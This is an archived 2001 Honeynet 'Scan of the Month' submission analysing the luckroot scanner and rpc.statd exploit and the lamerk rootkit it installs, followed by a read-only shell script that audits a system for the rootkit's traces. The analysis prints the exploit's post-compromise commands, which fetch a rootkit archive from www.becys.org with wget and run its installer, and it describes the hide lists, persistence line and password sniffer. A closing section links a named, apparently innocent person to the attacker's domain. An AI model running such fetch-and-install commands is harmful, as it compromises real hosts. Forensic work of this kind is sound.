From a.schuster@yendor.net Sat Mar 17 20:02:45 2001
Date: Sun, 11 Mar 2001 19:50:39 +0100
From: Andreas Schuster
To: project@honeynet.org
Subject: Scan of the Month - March

Hello,

below please find my first submission. Thanks for providing such an
interesting and unique site.

Kind regards,
Andreas Schuster (a.schuster@yendor.net)

======================================================================
1. What is the blackhat attempting to do with his command line syntax?
======================================================================

First, the blackhat sets up his tool. His home directory is /usr/sbin/.mail.
There he fetches the package LUCKROOT.tar (which, despite its name, is in
gzip-compressed format) containing the tool from www.becys.org using lynx.
The blackhat unpacks the archive, changes into the created directory
"luckroot" and runs the shell script "luckgo" many times.

The blackhat attempts to attack 13 different netblocks, each the size of a
class B network (16-bit prefix). The blocks are, in numerical order:

12.20/16     (assigned to AT&T by ARIN)
24.1/16      (assigned to @Home Network by ARIN)
63.1/16      (assigned to UUNET dialup by ARIN)
64.1/16      (assigned to Concentric by ARIN)
64.120/16    (assigned to Teligent Inc., Vienna, VA, US by ARIN)
194.1/16     (assigned to Slovak Tax Offices by RIPE)
200.120/16   (scanned twice) (ARIN, not assigned)
210.120/16   (assigned to Boranet by APNIC)
210.128/16   (nic.ad.jp, not assigned)
216.1/16     (scanned twice) (assigned to Business Internet Inc, Tampa, FL, US by ARIN)
216.10/16    (assigned to Virtual Development Inc, Clifton, NJ, US by ARIN)
216.200/16   (assigned to Above Net Communications Inc, San Jose, CA, US by ARIN)
216.210/16   (assigned to TotalNet Inc, Montreal, CA by ARIN)

=================================
2. What does the tool accomplish?
=================================

The tool scans the whole netblock address by address for port 111, which
usually is bound to the Sun RPC portmapper service.
If an open port has been found, it tries to exploit the remote format string
vulnerability (Bugtraq ID 1480) in rpc.statd. If it succeeds and gains a root
shell, it fetches the package xzibit.tar.gz via HTTP from www.becys.org. The
package is still available as of 2001-03-01. Obviously it contains a rootkit.
The tool proceeds to install the rootkit, starts an ssh 1.2.27 daemon (sshdu)
and a password sniffer (linsniffer). Finally, it sends a brief report about
the compromised system to becys@becys.org via email.

==========================
3. How does the tool work?
==========================

luckgo
------
"luckgo" is a simple shell script. It expects at least one argument. If no
arguments are given, it displays a brief usage instruction. If the
executables "luckscan-a" or "luckstatdx" don't exist, luckgo compiles them
from the sources contained in the archive. luckgo erases an existing regular
file named "scan.log" in the same directory. None of the programs found ever
writes to this file, however. Finally, the script invokes the scanner
"luckscan-a", passing the first three arguments and "111". The arguments are
the most significant octets of the address range to scan. The number 111
identifies the port to scan for (sunrpc).

luckscan-a
----------
The scanner invokes "luckstatdx" with option "-d" for every address it finds
listening on port 111.

luckstatdx
----------
Option "-d" instructs luckstatdx to use its hardcoded exploit code. The
exploit aims at Linux on a 32-bit Intel architecture. According to a comment
found in the exploit code, "becys" added a rootkit installer to the original
code. It runs the following commands on the root shell gained:

cd /                                          # change to root directory
uname -a                                      # print system type
id                                            # are we root?
wget -nd http://www.becys.org/xzibit.tar.gz   # fetch the rootkit ...
tar -zxvf xzibit.tar.gz                       # ... unpack ...
cd lamerk
./install                                     # and install it
cd /
rm -rf lamerk xzibit.tar.gz                   # remove the archive
                                              # (the installer does the same before, though)

Now for the rootkit. The archive contains the following files:

drwxr-xr-x 1000/1000       0 2001-02-17 13:03 lamerk/
-rwxr-xr-x 1000/1000   19840 1983-09-26 01:45 lamerk/ifconfig
-rwx------ 1000/1000    7165 1983-09-26 01:45 lamerk/linsniffer
-rwx------ 1000/1000      75 1983-09-26 01:45 lamerk/logclear
-rwxr-xr-x 1000/1000   35300 1983-09-26 01:45 lamerk/netstat
-rwxr-xr-x 1000/1000   33280 1983-09-26 01:45 lamerk/ps
-rwxr-xr-x 1000/1000    4060 1983-09-26 01:45 lamerk/sense
-rwx------ 1000/1000    8268 1983-09-26 01:45 lamerk/sl2
-rwxr-xr-x 1000/1000   53588 1983-09-26 01:45 lamerk/top
-rw-r--r-- 1000/1000     704 2001-02-19 03:04 lamerk/s
-rwx------ 1000/1000    1916 2001-02-17 13:02 lamerk/install
-rwxr-xr-x 1000/1000  686535 2000-12-02 21:43 lamerk/sshdu
-rw------- 1000/1000     541 1983-09-26 01:45 lamerk/ssh_host_key
-rw------- 1000/1000     512 1983-09-26 01:45 lamerk/ssh_random_seed
-rwxr-xr-x 1000/1000      76 2000-11-11 23:01 lamerk/hdparm
-rwxr-xr-x 1000/1000    4620 2000-08-09 04:06 lamerk/becys.cgi

install
-------
- replaces /sbin/ifconfig, /bin/netstat, /bin/ps and /usr/bin/top with
  versions out of the rootkit.

- creates the regular file /dev/dsx containing:

  3 sl2
  3 sshdu
  3 linsniffer
  3 smurf
  3 slice
  3 mech
  3 muh
  3 bnc
  3 psybnc

  References to this file are found in ps and top.

- creates a regular file /dev/caca containing (without the comments):

  1 193.231.139   # hides all connections from 193.231.139.0/24
                  # (ROEDUNET connected highschools, RO)
  1 213.154.137   # hides all connections from 213.154.137.0/24
                  # (PCNET - ATM-ADSL Network, RO)
  1 193.254.34    # hides all connections from 193.254.34.0/24
                  # (FININVNET, RO)
  3 6969          # hides all connections to local port 6969, used by the blackhat's sshd
  3 3666          # hides all connections to local port 3666
  3 31221         # hides all connections to local port 31221
  3 22546         # hides all connections to local port 22546
  4 6969          # hides all connections to remote port 6969
  4 2222          # hides all connections to remote port 2222

  A reference to this file is found in netstat. (Explanation taken from the
  Linux Root Kit v5 readme.)

- creates a directory /dev/ida/.inet and moves the following files over
  there: linsniffer, logclear, sense, sl2, sshdu, s, ssh_host_key,
  ssh_random_seed, sl2new.c

- appends the following line to /etc/rc.d/sysinit:

  /usr/bin/hdparm -t1 -X53 -p

  Note: /etc/rc.d/sysinit doesn't exist on all flavours of Linux. For
  example, this file exists on Red Hat, but it doesn't exist on Debian.

- installs hdparm in /usr/bin and finally invokes it. This starts sshdu and
  linsniffer. Note: on Linux ext2fs partitions, the file is marked as
  "immutable" using file system attributes. Afterwards, the file cannot be
  deleted or renamed, no link can be made to it and no data can be written
  to it.

- tries to install a cgi-script

- gathers some info about the compromised system and mails it to
  becys@becys.org. The report covers
  - interface address(es) (from ifconfig)
  - fully qualified domain name (from hostname -f)
  - OS type and version (from uname -a)

- removes the rootkit archive

ifconfig
--------
This hacked version of ifconfig doesn't indicate the PROMISC state of an
interface. The string "PROMISC" is missing, while it is present in the
original program.

linsniffer
----------
This appears to be a password sniffer.
Based on a string found in the executable, it listens on eth0 by default.
Captured passwords are recorded in a file named "tcp.log".

logclear
--------
A simple shell script which clears the log of sniffed passwords and restarts
linsniffer.

netstat
-------
This program is also a part of LRK4/5. It suppresses output as configured in
/dev/caca.

ps
--
This program is also a part of LRK4/5. It suppresses output as configured in
/dev/dsx.

sense
-----
Processes the logfile of linsniffer, extracting passwords.

sl2
---
A port scanner.

top
---
This program is also a part of LRK4/5. It suppresses output as configured in
/dev/dsx.

s
-
Configuration file for sshd. Some interesting parts:

Port 6969                  # listen on port 6969
ListenAddress 0.0.0.0      # listen on any address
SyslogFacility DAEMON
PermitRootLogin no

sshdu
-----
This appears to be an ssh daemon, version 1.2.27. I expect a backdoor patched
in, like in
http://packetstorm.securify.com/UNIX/penetration/rootkits/sshd.c.diff-1.2.27
Remember, no account has been created during exploitation or setup of the
rootkit, and root login is disabled by configuration.

hdparm
------
Starts sshdu and linsniffer.

becys.cgi
---------
An interface to remotely execute shell commands over the web?

===================================================================
4. Is this tool a worm, or would you classify it as something else?
===================================================================

The tool lacks the ability to replicate itself over the network. On a freshly
compromised system, it only installs an ssh daemon and a password sniffer,
but it doesn't fetch the scanner/exploit tool and re-iterate. So I don't
classify it as a worm. It's an automated tool combining the steps of scanning
for a vulnerability, exploiting the vulnerability and installing a rootkit to
conceal the break-in and further activity.

======================================================================
5. Is this tool original, or is it simply based on previous tools? If based
   on previous tools, which ones and what is modified?
======================================================================

Main parts of the toolkits found on www.becys.org have been taken from other
kits known before:

luckscan-a is based on "pscan-a.c" of the "cracker" package by
ryan@phorce.net, archived at packetstorm
http://packetstorm.securify.com/UNIX/scanners/cracker.tgz
The invocation of luckstatdx has been added.

luckstatdx, the exploit, appears to be statdx by ron1n, as found on
securityfocus.com. "Becys" modified runshell() to fetch and install the
rootkit.

ifconfig, netstat, ps, and top have been taken from the Linux Root Kit by
Lord Somer. linsniffer was contained in version 4 of said rootkit, but got
replaced with a libpcap-based sniffer in edition 5 (LRK5).

=====================================================================
Bonus Question: What information can you obtain about who is using or
created the tool?
=====================================================================

Cui bono? Compromised sites are reported to becys@becys.org. Also,
www.becys.org is the place where the rootkit is fetched from. So the attacker
may be affiliated with becys.org.

According to whois.bulkregister.com, the domain is registered to:

  bSoft
  1 Hensel Dr. Apt.#Z1F
  College Station, Texas 77840
  US

  Domain Name: BECYS.ORG

  Administrative Contact:
    Qian Wang  becys@yahoo.com
    bSoft
    1 Hensel Dr. Apt.#Z1F
    College Station, Texas 77840
    US
    Phone- (979)862-9233
    Fax-

Searching Google for "1 Hensel Dr., College Station, TX, 77840" leads to
Texas A&M University. An on-site search for "Qian Wang" points to his
official homepage:
http://www.physics.tamu.edu/services/comp_support/person.html/Wang,Qian
He's a member of the computer support team. There, he's the Linux expert.
I wasn't able to look up the phone number given above in TAMU's online phone
book.
It doesn't match the number returned for Qian Wang (neither in office nor at
home).

Querying Google for the email address leads to
http://www.rdsnet.ro/rds-bin/publicitate_detaliu?anunttype_id=1
The board is dedicated to cars. The author, who gives "becys@yahoo.com" as
contact, inquires about a URI covering instructions on how to tune German or
Austrian diesel car engines (if I got it right - I don't speak Romanian!).

Given the fact that the rootkit conceals connections to some networks from
Romania, it's more than likely the attacker is coming from Romania. Then, the
administrative contact given is a false trace, maybe some kind of revenge?
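As a closing, added example that is not part of Andreas's submission or of the luckroot/lamerk code: a POSIX shell audit for the traces the "install" script leaves behind, as listed in section 3. It reads files and /proc directly instead of calling ps, netstat or ifconfig, because those are exactly the binaries the rootkit replaces; the optional path prefix (for a mounted image of a suspect disk) and the function names are my own.

```shell
#!/bin/sh
# Added example, not part of the original submission: a read-only audit for the
# traces the "lamerk" installer leaves behind, as listed in section 3. ROOT is an
# optional path prefix so a mounted image of a suspect disk can be audited
# instead of the live system (assumed usage: audit_lamerk /mnt/evidence).

lamerk_report() {
    printf 'FINDING: %s\n' "$1"
    lamerk_findings=$((lamerk_findings + 1))
}

audit_lamerk() {
    root="${1:-}"          # empty prefix = live root filesystem
    lamerk_findings=0
    # Hide lists read by the trojaned ps/top (/dev/dsx) and netstat (/dev/caca)
    for f in /dev/dsx /dev/caca; do
        if [ -f "$root$f" ]; then lamerk_report "rootkit hide list $f exists"; fi
    done
    # Directory install moves sshdu, linsniffer, sense, sl2 and the ssh keys into
    if [ -d "$root/dev/ida/.inet" ]; then lamerk_report "hidden directory /dev/ida/.inet exists"; fi
    # Persistence: the line install appends to /etc/rc.d/sysinit
    if [ -f "$root/etc/rc.d/sysinit" ] && grep -q 'hdparm -t1 -X53 -p' "$root/etc/rc.d/sysinit"; then
        lamerk_report "start-up line for /usr/bin/hdparm in /etc/rc.d/sysinit"
    fi
    # The fake hdparm is a 76-byte shell script; the genuine hdparm is an ELF binary
    if [ -f "$root/usr/bin/hdparm" ]; then
        case "$(head -n 1 "$root/usr/bin/hdparm")" in
            '#!'*) lamerk_report "/usr/bin/hdparm is a shell script, not the genuine binary" ;;
        esac
        # install marks it immutable on ext2; lsattr shows that as an 'i' flag
        if command -v lsattr >/dev/null 2>&1 &&
           lsattr "$root/usr/bin/hdparm" 2>/dev/null | awk '{print $1}' | grep -q i; then
            lamerk_report "/usr/bin/hdparm carries the immutable attribute"
        fi
    fi
    # The trojaned ifconfig lacks the string PROMISC that the original contains
    if [ -f "$root/sbin/ifconfig" ] && ! grep -q PROMISC "$root/sbin/ifconfig"; then
        lamerk_report "/sbin/ifconfig lacks the PROMISC string"
    fi
    # Trojaned netstat hides local port 6969, so read /proc/net/tcp directly:
    # 6969 = 0x1B39, socket state 0A = LISTEN
    if [ -f "$root/proc/net/tcp" ] && grep -qi ':1B39 [0-9A-F]*:[0-9A-F]* 0A ' "$root/proc/net/tcp"; then
        lamerk_report "a socket is listening on TCP port 6969 (sshdu default from file s)"
    fi
    if [ "$lamerk_findings" -eq 0 ]; then
        echo "no lamerk indicators found"
        return 0
    fi
    return 1
}
```

The function exits non-zero when anything is found, so it can be dropped into a cron job or a host-check script; the PROMISC and port-6969 checks are heuristics that a legitimate build or service could also trip, so treat each FINDING as a lead, not a verdict.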